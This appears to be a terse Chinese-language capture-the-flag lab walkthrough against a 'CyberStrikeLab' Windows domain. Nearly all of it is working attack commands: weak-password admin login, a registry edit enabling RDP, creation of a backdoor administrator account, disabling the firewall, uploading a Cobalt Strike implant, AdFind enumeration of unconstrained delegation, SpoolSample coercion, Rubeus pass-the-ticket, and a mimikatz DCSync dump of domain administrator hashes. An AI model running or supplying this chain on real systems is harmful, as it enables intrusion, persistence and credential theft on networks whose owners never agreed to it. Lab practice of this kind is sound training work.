ZZZMCS #
直接访问80端口,进入/admin登录界面,使用弱密码admin/admin123456进入到后台
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
远程登录后,刚好发现了360
RDP Brute #
fscan扫描结果如下
[libdefaults]
default_realm = CYBERSTRIKE.LAB
dns_lookup_realm = false
dns_lookup_kdc = false
[realms]
CYBERSTRIKE.LAB = {
kdc = 10.5.5.66
admin_server = 10.5.5.66
}
[domain_realm]
.cyberstrike.lab = CYBERSTRIKE.LAB
cyberstrike.lab = CYBERSTRIKE.LAB
登录后在根目录拿到flag2
上传cs的定向木马,连接上线
非约束委派 #
查询当前域内的非约束委派用户
AdFind.exe -b "DC=cyberstrikelab,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn
shell SpoolSample.exe DC CYBERWEB
shell Rubeus.exe ptt /ticket:<ticket>
mimikatz导出哈希
mimikatz.exe "lsadump::dcsync /domain:cyberstrikelab.com /user:cyberstrikelab\Administrator" "exit"